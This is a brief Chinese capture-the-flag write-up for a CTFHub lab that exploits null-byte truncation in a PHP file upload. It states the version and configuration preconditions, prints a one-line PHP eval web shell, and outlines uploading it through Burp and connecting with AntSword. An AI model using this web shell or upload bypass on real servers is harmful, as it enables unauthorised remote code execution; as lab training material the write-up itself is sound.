- 00截断的原理
http://www.admintony.com/%E5%85%B3%E4%BA%8E%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%8400%E6%88%AA%E6%96%AD%E5%88%86%E6%9E%90.html
- 从中可知00截断的限制
1.php版本必须小于5.3.4
2.magic_quotes_gpc=off
- 创建php文件
<?php @eval($_POST['pass']);?>
- 打开burp对上传过程抓包并作如下修改
- 上传成功后访问
http://challenge-1a00289876b98f02.sandbox.ctfhub.com:10080/upload/11.php
- 返回空白页
- 用蚁剑连接后得到flag